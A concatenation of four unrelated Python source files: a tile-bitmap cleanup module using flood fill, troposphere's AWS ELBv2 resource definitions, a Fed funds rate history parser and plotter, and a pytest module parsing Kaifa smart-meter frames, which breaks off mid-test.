def cfb_save(cfb, fn):
    """Save cfb as a minimal image: one pixel per tile, colored per bitmap2fill."""
    im = Image.new("RGB", cfb.crs, "white")
    draw = ImageDraw.Draw(im)
    for (c, r) in cfb.cr():
        # A 1x1 rectangle paints the single pixel at (c, r).
        draw.rectangle((c, r, c, r), fill=bitmap2fill[cfb.bitmap[(c, r)]])
    im.save(fn)
def cfb_verify(cfb):
    """Sanity-check that every tile coordinate in cfb.bitmap lies inside
    the grid bounds given by cfb.crs; raise on the first violation."""
    max_c, max_r = cfb.crs
    for (c, r) in cfb.bitmap:
        if c >= max_c or r >= max_r:
            raise Exception("Got c=%d, r=%d w/ global cs=%d, rs=%d" % (c, r, max_c, max_r))
def filt_unk_lone(bitmap, unk_open):
    """Drop isolated unknowns: any tile in unk_open whose four neighbours are
    all void becomes 'v' and is removed from the working set.
    unk_open: set of (col, row) coords — presumably the open 'u' tiles; verify
    against caller."""
    # Iterate a copy so discards don't disturb the sweep.
    for c, r in set(unk_open):
        # look for adjacent
        if (bitmap.get((c - 1, r), 'v') == 'v' and bitmap.get((c + 1, r), 'v') == 'v' and
            bitmap.get((c, r - 1), 'v') == 'v' and bitmap.get((c, r + 1), 'v') == 'v'):
            print ' Unknown %dc, %dr rm: lone' % (c, r)
            bitmap[(c, r)] = 'v'
            unk_open.discard((c, r))
def bitmap_netstat(bitmap, c, r, keep=lambda x: x in 'mu'):
    '''
    return dictionary with m and u keys
    each key holds a set with the cols and rows contiguous with start point c, r (including c, r)

    Implemented with an explicit work stack instead of recursion: the original
    recursive version could blow through the interpreter stack on large
    polygons (its own TODO).  Results are identical — the final sets do not
    depend on visit order.
    TODO: abort when find certain metal threshold?
    '''
    ret = {'m': set(), 'u': set()}
    checked = set()
    stack = [(c, r)]
    while stack:
        cc, rr = stack.pop()
        if (cc, rr) in checked:
            continue
        this = bitmap.get((cc, rr), None)
        # Out of bounds?
        if this is None:
            continue
        checked.add((cc, rr))
        # Void? We are off the polygon: stop looking
        if not keep(this):
            continue
        # got something
        ret[this].add((cc, rr))
        # Expand to the four cardinal neighbours.
        stack.extend(((cc - 1, rr), (cc + 1, rr), (cc, rr - 1), (cc, rr + 1)))
    return ret
def trans_group(bitmap, c, r, to):
    '''Recolor the entire contiguous group of tiles sharing the type at (c, r) to `to`.'''
    start_type = bitmap[(c, r)]
    # Flood-fill only tiles of the starting type, then rewrite them in place.
    group = bitmap_netstat(bitmap, c, r, keep=lambda x: x in start_type)[start_type]
    for coord in group:
        bitmap[coord] = to
'''
Remove any segments that are composed of only unknown and 0-1 positive matches
'''
def filt_unk_groups(cfb, unk_open):
    """Delete connected groups that are mostly unknown (at most one metal
    tile) — unless the group's metal touches the bitmap border, in which
    case it is kept as a warning."""
    to_remove = set()
    checked = set()
    for c, r in set(unk_open):
        # Each connected group only needs to be examined once.
        if (c, r) in checked:
            continue
        bins = bitmap_netstat(cfb.bitmap, c, r)
        checked = checked.union(bins['u'])

        def has_border_m():
            # True when any metal tile of this group lies within 2 tiles of
            # the grid border.
            if len(bins['m']) == 0:
                return False
            for (cm, rm) in bins['m']:
                if cm <= 2 or cm >= cfb.crs[0] - 2 or \
                   rm <= 2 or rm >= cfb.crs[1] - 2:
                    return True
            return False

        if len(bins['m']) <= 1:
            # if there's metal at a border keep it
            # tries to level out penalties for not being able to linearize these
            # keeping as warnings instead of removing
            # xxx: should just keep the unknown near the border?
            if has_border_m():
                continue
            print ' Unknown %dc, %dr rm: %d unknowns, %d metal' % (c, r, len(bins['u']), len(bins['m']))
            to_remove = to_remove.union(bins['u'])
            to_remove = to_remove.union(bins['m'])
    # Apply removals after the sweep so iteration isn't disturbed.
    for cr in to_remove:
        cfb.bitmap[cr] = 'v'
        unk_open.discard(cr)
def prop_ag(cfb, bitmap_ag, unk_open):
    """Promote tiles from a secondary bitmap (bitmap_ag) to metal in cfb where
    they extend an existing metal run.
    NOTE(review): bitmap_ag semantics inferred from use (same (c, r) -> state
    layout as cfb.bitmap) — confirm with the caller."""
    # Collect promotions first, apply after the sweep (avoids cascading).
    to_promote = set()
    for c, r in cfb.cr():
        # Skip if nothing is there
        if bitmap_ag[(c, r)] == 'v':
            continue
        # Do we already think something is there?
        if cfb.bitmap[(c, r)] == 'm':
            continue
        # Is there something to extend?
        if not has_around(cfb.bitmap, c, r, 'm', order=2):
            continue
        print ' %dc, %dr => m: join m' % (c, r)
        to_promote.add((c, r))
    for (c, r) in to_promote:
        cfb.bitmap[(c, r)] = 'm'
        unk_open.discard((c, r))
def has_around(bitmap, c, r, t, d='v', order=1):
    '''Return True when tiles of type t run for order+1 consecutive tiles
    (including (c, r) itself) in at least one of the four cardinal
    directions.  Missing tiles default to d.

    (The old docstring claimed the test was against d — it is against t.
    A dead commented-out earlier version was also removed.)
    '''
    # the four directions
    directions = (
        lambda i: (c - i, r),
        lambda i: (c + i, r),
        lambda i: (c, r - i),
        lambda i: (c, r + i),
    )
    for cr in directions:
        # order+1 tiles (self plus `order` steps) must all match t.
        if all(bitmap.get(cr(i), d) == t for i in range(order + 1)):
            return True
    # No direction matched
    return False
'''
If a single unknown is on a contiguous strip of metal its likely a via has distorted it
Note: this will ocassionally cause garbage to incorrectly merge nets
'''
def munge_unk_cont(bitmap, unk_open):
    """Promote lone unknowns embedded in a metal run to metal."""
    # Don't propagate
    # Make a list and apply it after the sweep
    to_promote = set()
    for c, r in set(unk_open):
        # Abort if any adjacent unknowns
        if has_around(bitmap, c, r, 'u', order=1):
            continue
        # Is there surrounding metal forming a line? (or solid)
        if not has_around(bitmap, c, r, 'm', order=2):
            continue
        print ' Unknown %dc, %dr => m: join m' % (c, r)
        to_promote.add((c, r))
    for (c, r) in to_promote:
        bitmap[(c, r)] = 'm'
        unk_open.discard((c, r))
|
<filename>troposphere/elasticloadbalancingv2.py
# Copyright (c) 2012-2013, <NAME> <<EMAIL>>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSObject, AWSProperty, If, Tags
from .validators import (
elb_name, exactly_one, network_port,
tg_healthcheck_port, integer,
one_of
)
class LoadBalancerAttributes(AWSProperty):
    """A Key/Value attribute entry for a LoadBalancer.

    props maps CloudFormation property name -> (type, required flag),
    per troposphere convention.
    """
    props = {
        'Key': (basestring, False),
        'Value': (basestring, False)
    }
class Certificate(AWSProperty):
    """A certificate ARN attached to a listener."""
    props = {
        'CertificateArn': (basestring, False)
    }
class AuthenticateCognitoConfig(AWSProperty):
    """authenticate-cognito action configuration for an ELBv2 listener rule.

    Per the AWS CloudFormation resource specification only UserPoolArn,
    UserPoolClientId and UserPoolDomain are required; SessionTimeout is
    optional.  It was incorrectly marked required here — the sibling
    AuthenticateOidcConfig already marks it optional.
    """
    props = {
        "AuthenticationRequestExtraParams": (dict, False),
        "OnUnauthenticatedRequest": (basestring, False),
        "Scope": (basestring, False),
        "SessionCookieName": (basestring, False),
        # Optional per AWS docs; was (integer, True) by mistake.
        "SessionTimeout": (integer, False),
        "UserPoolArn": (basestring, True),
        "UserPoolClientId": (basestring, True),
        "UserPoolDomain": (basestring, True)
    }
class AuthenticateOidcConfig(AWSProperty):
    """authenticate-oidc action configuration for an ELBv2 listener rule."""
    props = {
        "AuthenticationRequestExtraParams": (dict, False),
        "AuthorizationEndpoint": (basestring, True),
        "ClientId": (basestring, True),
        "ClientSecret": (basestring, True),
        "Issuer": (basestring, True),
        "OnUnauthenticatedRequest": (basestring, False),
        "Scope": (basestring, False),
        "SessionCookieName": (basestring, False),
        "SessionTimeout": (integer, False),
        "TokenEndpoint": (basestring, True),
        "UserInfoEndpoint": (basestring, True)
    }
class RedirectConfig(AWSProperty):
    """redirect action configuration; StatusCode must be HTTP_301/HTTP_302."""
    # https://docs.aws.amazon.com/
    # AWSCloudFormation/latest/UserGuide/
    # aws-properties-elasticloadbalancingv2-listener-redirectconfig.html
    props = {
        'Host': (basestring, False),
        'Path': (basestring, False),
        'Port': (basestring, False),
        'Protocol': (basestring, False),
        'Query': (basestring, False),
        'StatusCode': (basestring, True),
    }

    def validate(self):
        # StatusCode is required, so one_of can check it unconditionally.
        one_of(self.__class__.__name__,
               self.properties,
               'StatusCode',
               ['HTTP_301', 'HTTP_302'])
class FixedResponseConfig(AWSProperty):
    """fixed-response action configuration."""
    props = {
        'ContentType': (basestring, False),
        'MessageBody': (basestring, False),
        'StatusCode': (basestring, False),
    }

    def validate(self):
        # NOTE(review): ContentType is optional but is always passed through
        # one_of here — confirm one_of tolerates a missing/None value.
        one_of(self.__class__.__name__,
               self.properties,
               'ContentType',
               ['text/plain', 'text/css', 'text/html',
                'application/javascript', 'application/json'])
class Action(AWSProperty):
    """A listener / listener-rule action.

    validate() enforces that Type is one of forward / redirect /
    fixed-response and that exactly the matching config property is
    supplied for that Type.
    """
    props = {
        "AuthenticateCognitoConfig": (AuthenticateCognitoConfig, False),
        "AuthenticateOidcConfig": (AuthenticateOidcConfig, False),
        "FixedResponseConfig": (FixedResponseConfig, False),
        "Order": (integer, False),
        "RedirectConfig": (RedirectConfig, False),
        "TargetGroupArn": (basestring, False),
        "Type": (basestring, True)
    }

    def validate(self):
        one_of(self.__class__.__name__,
               self.properties,
               'Type',
               ['forward', 'redirect', 'fixed-response'])

        def requires(action_type, prop):
            # Closure over self: `prop` must be present iff Type == action_type.
            if self.properties.get('Type') == action_type and \
                    prop not in self.properties:
                raise ValueError(
                    'Type "%s" requires definition of "%s"' % (
                        action_type, prop
                    )
                )
            if prop in self.properties and \
                    self.properties.get('Type') != action_type:
                raise ValueError(
                    'Definition of "%s" allowed only with '
                    'type "%s", was: "%s"' % (
                        prop, action_type, self.properties.get('Type')
                    )
                )

        requires('forward', 'TargetGroupArn')
        requires('redirect', 'RedirectConfig')
        requires('fixed-response', 'FixedResponseConfig')
class Condition(AWSProperty):
    """A rule condition (Field matched against Values)."""
    props = {
        'Field': (basestring, True),
        'Values': ([basestring], True)
    }
class Matcher(AWSProperty):
    """HTTP code(s) considered a healthy response by a target group health check."""
    props = {
        'HttpCode': (basestring, False)
    }
class SubnetMapping(AWSProperty):
    """A subnet + Elastic IP allocation pair for a load balancer."""
    props = {
        'AllocationId': (basestring, True),
        'SubnetId': (basestring, True)
    }
class TargetGroupAttribute(AWSProperty):
    """A Key/Value attribute entry for a TargetGroup."""
    props = {
        'Key': (basestring, False),
        'Value': (basestring, False)
    }
class TargetDescription(AWSProperty):
    """A registered target (instance id / IP) for a TargetGroup."""
    props = {
        'AvailabilityZone': (basestring, False),
        'Id': (basestring, True),
        'Port': (network_port, False)
    }
class Listener(AWSObject):
    """AWS::ElasticLoadBalancingV2::Listener resource."""
    resource_type = "AWS::ElasticLoadBalancingV2::Listener"

    props = {
        'Certificates': ([Certificate], False),
        'DefaultActions': ([Action], True),
        'LoadBalancerArn': (basestring, True),
        'Port': (network_port, True),
        'Protocol': (basestring, True),
        'SslPolicy': (basestring, False)
    }
class ListenerCertificate(AWSObject):
    """AWS::ElasticLoadBalancingV2::ListenerCertificate resource."""
    resource_type = "AWS::ElasticLoadBalancingV2::ListenerCertificate"

    props = {
        'Certificates': ([Certificate], True),
        'ListenerArn': (basestring, True),
    }
class ListenerRule(AWSObject):
    """AWS::ElasticLoadBalancingV2::ListenerRule resource."""
    resource_type = "AWS::ElasticLoadBalancingV2::ListenerRule"

    props = {
        'Actions': ([Action], True),
        'Conditions': ([Condition], True),
        'ListenerArn': (basestring, True),
        'Priority': (integer, True)
    }
# Valid values for TargetGroup 'TargetType'.
TARGET_TYPE_INSTANCE = 'instance'
TARGET_TYPE_IP = 'ip'
class TargetGroup(AWSObject):
    """AWS::ElasticLoadBalancingV2::TargetGroup resource."""
    resource_type = "AWS::ElasticLoadBalancingV2::TargetGroup"

    props = {
        'HealthCheckIntervalSeconds': (integer, False),
        'HealthCheckPath': (basestring, False),
        'HealthCheckPort': (tg_healthcheck_port, False),
        'HealthCheckProtocol': (basestring, False),
        'HealthCheckTimeoutSeconds': (integer, False),
        'HealthyThresholdCount': (integer, False),
        'Matcher': (Matcher, False),
        'Name': (basestring, False),
        'Port': (network_port, True),
        'Protocol': (basestring, True),
        'Tags': ((Tags, list), False),
        'TargetGroupAttributes': ([TargetGroupAttribute], False),
        'Targets': ([TargetDescription], False),
        'TargetType': (basestring, False),
        'UnhealthyThresholdCount': (integer, False),
        'VpcId': (basestring, True),
    }
class LoadBalancer(AWSObject):
    """AWS::ElasticLoadBalancingV2::LoadBalancer resource.

    validate() requires exactly one of Subnets / SubnetMappings — except
    when both are CloudFormation ``If`` conditionals, in which case the
    choice is resolved at deploy time and cannot be checked here.
    """
    resource_type = "AWS::ElasticLoadBalancingV2::LoadBalancer"

    props = {
        'LoadBalancerAttributes': ([LoadBalancerAttributes], False),
        'Name': (elb_name, False),
        'Scheme': (basestring, False),
        'IpAddressType': (basestring, False),
        'SecurityGroups': (list, False),
        'SubnetMappings': ([SubnetMapping], False),
        'Subnets': (list, False),
        'Tags': ((Tags, list), False),
        'Type': (basestring, False),
    }

    def validate(self):
        conds = [
            'SubnetMappings',
            'Subnets',
        ]

        def check_if(names, props):
            # True when every named property is present AND is an If conditional.
            validated = []
            for name in names:
                validated.append(name in props and isinstance(props[name], If))
            return all(validated)

        if check_if(conds, self.properties):
            return

        exactly_one(self.__class__.__name__, self.properties, conds)
|
<reponame>jrrpanix/ML9
import sys
import os
from matplotlib.dates import DateFormatter
import datetime
import matplotlib.pyplot as plt
import numpy as np
class RateDecision:
    """One Fed rate decision: the rate before and after a meeting plus the
    action taken (decision label, direction -1/0/1, and rate delta)."""

    def __init__(self, d0, d1, r0, r1, dec, d, dr):
        # d0/d1: meeting and announcement dates (datetime)
        # r0/r1: fed funds rate on each of those dates
        # dec: decision label ('raise'/'lower'/'unchg'); d: direction; dr: rate change
        self.date0 = d0
        self.date1 = d1
        self.rate0 = r0
        self.rate1 = r1
        self.decision = dec
        self.direction = d
        self.dRate = dr

    def __str__(self):
        # CSV row: date0,date1,rate0,rate1,decision,direction,dRate
        fields = (
            self.date0.strftime("%Y%m%d"),
            self.date1.strftime("%Y%m%d"),
            "%.2f" % self.rate0,
            "%.2f" % self.rate1,
            self.decision,
            "%d" % self.direction,
            "%.2f" % self.dRate,
        )
        return ",".join(fields)
class ParseWiki:
    """
    quick code to paree the WikiPedia Fed Rate History Table
    and create a csv file
    input ../text/history/WikipediaFF.txt
    output ../test/history/WikipediaFFParsed.csv
    """
    def parse(fname="../text/history/WikipediaFF.txt"):
        """Parse the raw Wikipedia table dump and print one CSV row per line.

        Fix: the row guard previously allowed 4-token rows through, but
        ``tokens[4]`` (the discount rate) is read below — such rows raised
        IndexError.  The guard now requires at least 5 tokens, skipping
        malformed rows instead of crashing.
        NOTE: called without an instance (no self), i.e. ParseWiki.parse(...).
        """
        #output ../test/history/WikipediaFFParsed.csv
        def fmtDate(m, d, y):
            # Month name + day + year -> YYYYMMDD.
            months = ["January", "February", "March", "April", "May", "June", "July",
                      "August", "September", "October", "November", "December"]
            mi = months.index(m)
            return "%s%02d%02d" % (y, mi + 1, int(d))

        # hack for unrecognized character '-' from web
        def getff(ff):
            # Split a "a.bb-c.dd" fed-funds range; a short token is both bounds.
            if len(ff) < 5:
                return ff, ff
            return ff[0:4], ff[5:]

        # NOTE(review): this header string is built but never printed — it is
        # overwritten inside the loop; presumably the header print was lost.
        ss = "date,fflb,ffub,disc_rate"
        with open(fname) as fd:
            for i, line in enumerate(fd):
                if i == 0:
                    # Skip the table header row.
                    continue
                line = line.strip()
                line = line.replace("\t", " ")
                line = line.replace(",", " ")
                line = line.replace("  ", " ")
                line = line.replace("  ", " ")
                tokens = line.split(" ")
                tokens = [t for t in tokens if len(t) > 0]
                # tokens[4] is read below, so require at least 5 tokens
                # (was `< 4`, which crashed on 4-token rows).
                if len(tokens) < 5:
                    continue
                m, d, y = tokens[0], tokens[1], tokens[2]
                ff = tokens[3].replace("%", "")
                fflb, ffub = getff(ff)
                dr = tokens[4].replace("%", "")
                ss = "%s,%.2f,%.2f,%s" % (fmtDate(m, d, y), float(fflb), float(ffub), dr)
                print(ss)
class HistDataReader:
    """Readers for the various fed-funds history data files.

    NOTE: methods take no ``self`` — they are called through the class as a
    namespace, e.g. HistDataReader.readMacroTrends(path).
    """
    def readWikiCSV(fname, cutoff=datetime.datetime(year=2001, month=1, day=1, hour=0, minute=0, second=0)):
        # read the parsed Wikipedia data "WikipediaFFParsed.csv"
        # input ../test/history/WikipediaFFParsed.csv
        # output returns date, rates vector
        def DT(ds):
            # "YYYYMMDD" -> datetime
            return datetime.datetime(int(ds[0:4]), int(ds[4:6]), int(ds[6:]), 0, 0, 0)
        dates, rates = [], []
        with open(fname) as fd:
            for i, line in enumerate(fd):
                line = line.strip()
                dt = DT(line.split(",")[0])
                # Drop rows before the cutoff date.
                if dt < cutoff: continue
                dates.append(dt)
                rates.append(float(line.split(",")[1]))
        return dates, rates

    def readMacroTrends(fname, cutoff=datetime.datetime(year=2001, month=1, day=1, hour=0, minute=0, second=0)):
        # read the downloaded macrotrends csv file
        # input ../text/history/fed-funds-rate-historical-chart.csv
        # output returns date, rates vector
        def DT(year, month, day, hour=0, minute=0, second=0):
            return datetime.datetime(year, month, day, hour, minute, second, 0)
        def parseDate(d):
            # "YYYY-MM-DD" -> datetime
            return DT(int(d[0:4]), int(d[5:7]), int(d[8:]))
        with open(fname) as fd:
            # `start` flips to True once the first 2-column row (the CSV
            # header) is seen; preamble lines before it are skipped.
            start = False
            dates, rates = [], []
            for i, line in enumerate(fd):
                line = line.strip()
                if len(line) == 0: continue
                if not start and len(line.split(",")) != 2: continue
                if not start and len(line.split(",")) == 2:
                    start = True
                    continue
                dt = parseDate(line.split(",")[0])
                if dt < cutoff: continue
                dates.append(dt)
                rates.append(float(line.split(",")[1]))
            return dates, rates

    def getMinutesDates(dirname):
        # extract dates from file names of fedminutes data
        # input ../text/minutes - directory name holding minutes files
        # output returns mdates, adates - the two dates on teh minutes file names
        def DT(ds):
            return datetime.datetime(int(ds[0:4]), int(ds[4:6]), int(ds[6:]), 0, 0, 0)
        mdates, adates = [], []
        # File names look like "<date0>_..._<date1>.<ext>" — first and last
        # underscore-separated fields are the meeting/announcement dates.
        for f in sorted(os.listdir(dirname)):
            se = os.path.splitext(f)[0]
            d0, d1 = se.split("_")[0], se.split("_")[-1]
            mdates.append(DT(d0))
            adates.append(DT(d1))
        return mdates, adates

    def readDecision(fname):
        # Read a RatesDecision.csv produced by CreateFedAction.create().
        def DT(ds):
            return datetime.datetime(int(ds[0:4]), int(ds[4:6]), int(ds[6:]), 0, 0, 0)
        data = []
        with open(fname) as fd:
            for line in fd:
                line = line.strip()
                if len(line) < 2: continue
                s = line.split(",")
                # Columns: date0, date1, rate0, rate1, decision, direction, dRate.
                data.append(RateDecision(DT(s[0]), DT(s[1]), float(s[2]), float(s[3]), s[4], int(s[5]), float(s[6])))
        return data
class PlotFFHist:
    """
    Plot MacroTrends FF, WikiPedia FF and FF minutes dates
    """
    def plotData(macroCSV, wikiCSV, minutesDIR):
        # NOTE: called without an instance — PlotFFHist.plotData(...).
        dates1, rates1 = HistDataReader.readMacroTrends(macroCSV)
        dates2, rates2 = HistDataReader.readWikiCSV(wikiCSV)
        mdates, adates = HistDataReader.getMinutesDates(minutesDIR)
        #Fmt = DateFormatter("%Y-%m")
        Fmt = DateFormatter("%Y")
        fig, ax = plt.subplots()
        ax.set(title="Federal Funds Rate History")
        ax.plot(dates1, rates1, 'b', label='MacroTrends')
        ax.plot(dates2, rates2, 'r', label='WikiPedia')
        MaxRate = np.max(rates1)
        # Vertical green line at each minutes (meeting) date.
        for i in range(len(mdates)):
            ax.plot([mdates[i], mdates[i]], [0, MaxRate], 'g')
        ax.xaxis.set_major_formatter(Fmt)
        handles, labels = ax.get_legend_handles_labels()
        ax.legend(handles, labels)
        plt.show()
class CreateFedAction:
    """Derive and plot the Fed's rate action around each minutes date.

    NOTE: methods take no ``self`` — called through the class as a namespace.
    """
    def create(minutesDIR, macroCSV, tol=0.03):
        # using the minutes dates and the macrotrends FF data set
        # create a dataset which is the FED action
        # input minutesDIR ../text/minutes
        # input macrotrends ../text/history/fed-funds-rate-historical-chart.csv
        # output RatesDecision.csv   (rows are printed, not written directly)
        mdates, adates = HistDataReader.getMinutesDates(minutesDIR)
        dates, rates = HistDataReader.readMacroTrends(macroCSV)
        for i in range(len(mdates)):
            md, ad = mdates[i], adates[i]
            # Look up the rate on the meeting date and the announcement date.
            # NOTE(review): dates.index() raises ValueError if a minutes date
            # is missing from the MacroTrends series — confirm inputs align.
            mix = dates.index(md)
            aix = dates.index(ad)
            r0, r1 = rates[mix], rates[aix]
            dr = r1 - r0
            # Classify using tol as the dead band around "no change".
            if dr > tol:
                c, d = "raise", 1
            elif dr < -tol:
                c, d = "lower", -1
            else:
                c, d = "unchg", 0
            print("%s,%s,%.2f,%.2f,%s,%d,%.2f" %
                  (md.strftime("%Y%m%d"), ad.strftime("%Y%m%d"), rates[mix], rates[aix], c, d, dr))

    def plot(decisionFile):
        # Scatter the decision direction over time: up=green ^, unchanged=blue x, down=red v.
        def points(data, direction):
            dates = np.array([d.date1 for i, d in enumerate(data) if d.direction == direction])
            ddir = np.array([d.direction for d in data if d.direction == direction])
            return dates, ddir
        data = HistDataReader.readDecision(decisionFile)
        update, updir = points(data, 1)
        unchdate, unchdir = points(data, 0)
        dndate, dndir = points(data, -1)
        Fmt = DateFormatter("%Y")
        fig, ax = plt.subplots()
        ax.set(title="Fed Rate Decisions")
        ax.scatter(update, updir, c='g', marker="^")
        ax.scatter(unchdate, unchdir, c='b', marker="x")
        ax.scatter(dndate, dndir, c='r', marker="v")
        ax.xaxis.set_major_formatter(Fmt)
        plt.show()
def main():
    """
    To Run
    python ./PlotData.py
    defaults :
    ../text/history/fed-funds-rate-historical-chart.csv
    ../text/history/WikipediaFFParsed.csv
    ../text/minutes
    ../text/history/RatesDecision.csv
    """
    defaults = ["../text/history/fed-funds-rate-historical-chart.csv",
                "../text/history/WikipediaFFParsed.csv",
                "../text/minutes",
                "../text/history/RatesDecision.csv"
                ]
    if len(sys.argv) == 2 and sys.argv[1] == "--help":
        print("Requires 3 Parameters, example usage")
        print("python ./PlotData.py %s %s %s" % (defaults[0], defaults[1], defaults[2]))
        quit()
    elif len(sys.argv) == 4:
        # Explicit paths: macrotrends CSV, wiki CSV, minutes directory.
        hist1, hist2, dirname = sys.argv[1], sys.argv[2], sys.argv[3]
    else:
        hist1, hist2, dirname = defaults[0], defaults[1], defaults[2]
    assert os.path.exists(hist1) and os.path.exists(hist2) and os.path.exists(dirname)
    # Currently only the decision plot is produced; the history plot is disabled.
    #PlotFFHist.plotData(hist1, hist2, dirname)
    CreateFedAction.plot(defaults[3])

if __name__ == '__main__':
    main()
|
"""Kaifa tests."""
# pylint: disable = no-self-use
from __future__ import annotations
from datetime import datetime, timezone, timedelta
from pprint import pprint
import construct
from han import kaifa
from tests.assert_utils import (
assert_apdu,
assert_obis_element,
)
# Raw LLC-PDU test frames as pushed by Kaifa HAN meters.
# Naming: no_list_* = Norwegian list formats (1/2/3), se_list = Swedish list.
# NOTE(review): byte layout (e6e700 header, 0f tag, invoke id, datetime,
# body) is inferred from the han.kaifa parser — confirm against its spec.

# NO list 1: a single value element (active power import).
no_list_1 = bytes.fromhex(
    "e6e700" "0f" "40000000" "090c07e3020401173416ff800000" "0201" "06000016dc"
)

# NO list 2: 13 value elements (ids, powers, currents, voltages).
no_list_2 = bytes.fromhex(
    (
        "e6e700"
        "0f"
        "40000000"
        "090c 07e40119060d091eff800000"
        "020d"
        "0907 4b464d5f303031"
        "0910 36393730363331343032363134343736"
        "0908 4d413330344833450600002611"
        "06 00000000"
        "06 00000000"
        "06 000001b3"
        "06 00008415"
        "06 00006dc7"
        "06 00004702"
        "06 00000878"
        "06 00000000"
        "06 0000088c"
    ).replace(" ", "")
)

# NO list 3: 18 value elements — list 2 plus meter datetime and energy totals.
no_list_3 = bytes.fromhex(
    (
        "e6e700"
        "0f"
        "40000000"
        "090c 07e40119060e000aff800000"
        "0212"
        "0907 4b464d5f303031"
        "0910 36393730363331343032363134343736"
        "0908 4d41333034483345"
        "06 00001328"
        "06 00000000"
        "06 00000000"
        "06 00000179"
        "06 000038eb"
        "06 00003d1b"
        "06 00002535"
        "06 00000891"
        "06 00000000"
        "06 0000089d"
        "090c 07e40119060e000aff800000"
        "06 04be76e8"
        "06 00000000"
        "06 000d922d"
        "06 0030feb4"
    ).replace(" ", "")
)

# SE list: 18 OBIS-tagged elements (obis code + typed value per element).
se_list = bytes.fromhex(
    (
        "e6e700"
        "0f"
        "40000000"
        "00"
        "0224"
        "09060100000281ff 09074b464d5f303031"
        "09060000600100ff 091037333430373334303733343037333430"
        "09060000600107ff 09074d413330344834"
        "09060100010700ff 0600000b00"
        "09060100020700ff 0600000000"
        "09060100030700ff 0600000000"
        "09060100040700ff 0600000042"
        "090601001f0700ff 0600001a7d"
        "09060100330700ff 0600000316"
        "09060100470700ff 06000017ed"
        "09060100200700ff 0600000912"
        "09060100340700ff 06000008fc"
        "09060100480700ff 06000008f1"
        "09060000010000ff 090c07e509160311231effffc400"
        "09060100010800ff 0600490b23"
        "09060100020800ff 0600000000"
        "09060100030800ff 0600006674"
        "09060100040800ff 060008d3e0"
    ).replace(" ", "")
)
class TestParseKaifa:
    """Test parse Kaifa frames.

    Exercises the low-level construct parser (kaifa.LlcPdu) against the raw
    fixture frames defined above and checks every parsed element.
    """
    def test_parse_se_list(self):
        """Parse SE list."""
        parsed = kaifa.LlcPdu.parse(se_list)
        print(parsed)
        # Invoke id 4194304; the SE frame header carries no timestamp (0).
        assert_apdu(parsed, 4194304, 0)
        assert (
            parsed.information.notification_body.type
            == kaifa.KaifaBodyType.OBIS_ELEMENTS
        )
        assert parsed.information.notification_body.length == 18
        # Items 0-2: list version, meter id, meter type (octet strings).
        assert_obis_element(
            parsed.information.notification_body.list_items[0],
            "1.0.0.2.129.255",
            "octet_string",
            "KFM_001",
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[1],
            "0.0.96.1.0.255",
            "octet_string",
            "7340734073407340",
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[2],
            "0.0.96.1.7.255",
            "octet_string",
            "MA304H4",
        )
        # Items 3-12: instantaneous power / current / voltage registers.
        assert_obis_element(
            parsed.information.notification_body.list_items[3],
            "1.0.1.7.0.255",
            "double_long_unsigned",
            2816,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[4],
            "1.0.2.7.0.255",
            "double_long_unsigned",
            0,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[5],
            "1.0.3.7.0.255",
            "double_long_unsigned",
            0,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[6],
            "1.0.4.7.0.255",
            "double_long_unsigned",
            66,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[7],
            "1.0.31.7.0.255",
            "double_long_unsigned",
            6781,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[8],
            "1.0.51.7.0.255",
            "double_long_unsigned",
            790,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[9],
            "1.0.71.7.0.255",
            "double_long_unsigned",
            6125,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[10],
            "1.0.32.7.0.255",
            "double_long_unsigned",
            2322,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[11],
            "1.0.52.7.0.255",
            "double_long_unsigned",
            2300,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[12],
            "1.0.72.7.0.255",
            "double_long_unsigned",
            2289,
        )
        # Item 13: meter clock — checked field-by-field since the value is a
        # nested container, not a plain scalar.
        date_time = parsed.information.notification_body.list_items[13]
        assert isinstance(date_time, construct.Container)
        assert date_time.obis == "0.0.1.0.0.255"
        assert date_time.value_type == "octet_string"
        assert date_time.value.datetime == datetime(
            2021, 9, 22, 17, 35, 30, tzinfo=timezone(timedelta(hours=1))
        )
        # Items 14-17: cumulative energy registers.
        assert_obis_element(
            parsed.information.notification_body.list_items[14],
            "1.0.1.8.0.255",
            "double_long_unsigned",
            4786979,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[15],
            "1.0.2.8.0.255",
            "double_long_unsigned",
            0,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[16],
            "1.0.3.8.0.255",
            "double_long_unsigned",
            26228,
        )
        assert_obis_element(
            parsed.information.notification_body.list_items[17],
            "1.0.4.8.0.255",
            "double_long_unsigned",
            578528,
        )

    def test_parse_no_list_1(self):
        """Parse NO list number 1."""
        parsed = kaifa.LlcPdu.parse(no_list_1)
        print(parsed)
        # NO frames carry a header timestamp (unlike the SE frame above).
        assert_apdu(parsed, 4194304, datetime(2019, 2, 4, 23, 52, 22))
        assert (
            parsed.information.notification_body.type
            == kaifa.KaifaBodyType.VALUE_ELEMENTS
        )
        assert parsed.information.notification_body.length == 1
        assert parsed.information.notification_body.list_items[0].index == 0
        assert parsed.information.notification_body.list_items[0].value == 5852

    def test_parse_no_list_2(self):
        """Parse NO list number 2."""
        parsed = kaifa.LlcPdu.parse(no_list_2)
        print(parsed)
        assert_apdu(parsed, 4194304, datetime(2020, 1, 25, 13, 9, 30))
        assert parsed.information.notification_body.length == 13
        # Items 0-2: list version, meter id, meter type.
        assert parsed.information.notification_body.list_items[0].index == 0
        assert parsed.information.notification_body.list_items[0].value == "KFM_001"
        assert parsed.information.notification_body.list_items[1].index == 1
        assert (
            parsed.information.notification_body.list_items[1].value
            == "6970631402614476"
        )
        assert parsed.information.notification_body.list_items[2].index == 2
        assert parsed.information.notification_body.list_items[2].value == "MA304H3E"
        # Items 3-12: numeric registers, in index order.
        assert parsed.information.notification_body.list_items[3].index == 3
        assert parsed.information.notification_body.list_items[3].value == 9745
